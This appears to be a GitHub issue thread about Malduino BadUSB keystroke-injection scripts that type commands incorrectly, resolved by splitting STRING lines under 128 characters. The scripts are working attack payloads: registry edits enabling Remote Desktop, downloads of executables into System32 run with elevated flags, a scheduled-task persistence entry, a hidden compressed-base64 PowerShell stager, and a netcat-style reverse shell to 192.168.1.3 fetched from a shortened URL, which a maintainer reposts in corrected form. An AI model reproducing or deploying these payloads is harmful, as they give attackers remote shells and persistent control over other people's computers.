Most of my scripts are not functioning as they do on the bunny and ducky platforms. I am seeing duplicate string sections entered in where they dont exist in the script; and other keys, such as ENTER not being inserted properly. example:
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
DELAY 200
ENTER
DELAY 3000
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
DELAY 200
ENTER
DELAY 3000
STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///payload.txt','%WINDIR%\System32\payload.exe')
DELAY 200
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///payload2.txt','%WINDIR%\System32\payload2.exe')
DELAY 200
ENTER
STRING %WINDIR%\System32\payload.exe -i -d -s /accepteula %WINDIR%\System32\payload2.exe
DELAY 200
ENTER
STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\payload.exe"

This section should output the following in a notepad:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
powershell (new-object System.Net.WebClient).DownloadFile('http:///payload.txt','%WINDIR%\System32\payload.exe')
powershell (new-object System.Net.WebClient).DownloadFile('http:///payload2.txt','%WINDIR%\System32\payload2.exe')
%WINDIR%\System32\taskmgnt.exe -i -d -s /accepteula %WINDIR%\System32\payload.exe
schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\payload.exe"

HOWEVER, this is what it outputs consistently:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fDenyTSConnectionsreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /fAllowToGetHelppowershell (new-object System.Net.WebClient).DownloadFile('http:///payload.txt','%WINDIR%\System32\payload.ex
powershell (new-object System.Net.WebClient).DownloadFile('http:///payload2.txt','%WINDIR%\System32\payload2.
%WINDIR%\System32\payload2.exe -i -d -s /accepteula %WINDIR%\System32\payload.exeschtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\payload.exe"

Some of this behavior seems similar to the bashbunny firmware bug that caused issues with strings that ended in .TXT. For some reason that threw the device into a bizarre fit. These oddities feel very similar to that type of thing.

Here is another example (actual payload text removed):
GUI r
DELAY 5000
STRING cmd
DELAY 200
ENTER
DELAY 5000
STRING if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("")))), [IO.Compression.CompressionMode]::Decompress)), [STRING.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("<BASE64PAYLOAD_64bit>")))), [IO.Compression.CompressionMode]::Decompress)), [STRING.Encoding]::ASCII)).ReadToEnd();")
DELAY 200
ENTER

This is the output:
cmd
if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamR
")

So, it types "cmd" then injects ENTER. Then it starts to type until it gets to ""Invoke-Expression $(New-Object IO.StreamR")". Then it goes back 2 spaces to the left of ") and the injects an ENTER which drops the ") down to the next line and the payload never progresses beyond this point.

I have a similar payload; but that opens up an admin prompt for an admin shell. It stops at the exact same place and performs the identical moving the cursor back 2 places and then injecting ENTER before the script stops entirely.

Please try to Split your STRING to multiple of them because the Maximum number of chars in a line are 256
Example:
GUI r
STRING cmd
ENTER
STRING Hello
STRING My
STRING Name
STRING is
ENTER

All of These Strings will be written in one line.

The first payload has no lines near 256 characters and it is still behaving in the manner described in my first post. It is acting as though it is possessed. I'm thinking that there is some character or character combination that is causing it to respond in a buggy way like the bashbunny issue on firmwares <1.4 with strings that ended in .TXT

Pkease try to change the “#define buffersize 256” to “#define buffersize 128” and short your lines to 127 Chars per line.

This is the code i have:
DELAY 1000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 500
ENTER
DELAY 500
STRING cd / & mkdir win & cd win & echo (wget 'https://tinyurl.com/ybqaln6m' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1
DELAY 500
ENTER
DELAY 500
STRING START /MIN a.exe 192.168.1.3 25565 -e cmd.exe -d & exit
ENTER

Notepad:
cmd
cd / & mkdir win & cd win & echo (wget 'https://tinyurl.com/ybqaln6m' -OutFile a.exe) > b.PS1 & powershell -ExecutionPoliy
START /MIN a.exe 192.168.1.3 25565 -e cmd.exe -d & exit

What should I do? Malduino doesen't write all letters...

@Nibot1 Can anyone here tell me why malduino sometimes writes the string ok and sometimes not?

@GreenSales
You must place a STRING command in front of every line with the string wich should be typed
Example:
STRING hello
STRING World
Will get **hello World ** written without an line break
And remember each line can only hold 127 chars including spaces

Try This Code
DELAY 1000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 500
ENTER
DELAY 500
STRING cd / & mkdir win & cd win & echo (wget 'https://tinyurl.com/ybqaln6m' -OutFile a.exe) > b.PS1
STRING & powershell -ExecutionPolicy ByPass -File b.ps1
DELAY 500
ENTER
DELAY 500
STRING START /MIN a.exe 192.168.1.3 25565 -e cmd.exe -d & exit
ENTER

Is this Issue solved ?

Well with that string yes.. But always aftar i startup my pc a script is written wrong.. And after i replug the usb everything is all right.. I can't see why that happens

I will try to implement your proposed fix and modifications to my payloads tonight and reply back with results. Thank you for your response.

Looking at my #define buffersize attribute it was already set to 128; but I didn't change it. I will reformat the payloads accordingly and report back. Thanks for your help!

With buffersize set at 128 and all lines set at 127 chars total or less is working. Thanks!

@ll3N1GmAll
Is this issue solved ?
If yes please close the issue.

Yes, this issue is resolved. I explained that in my response 13 days ago; but was not aware that I needed to close this (or even that I could close it). I apologize for my ignorance. I now see the "close and comment" button I overlooked last time. Closing now, thanks so much for your help. This has made my malduino everything I had hoped it would be! :)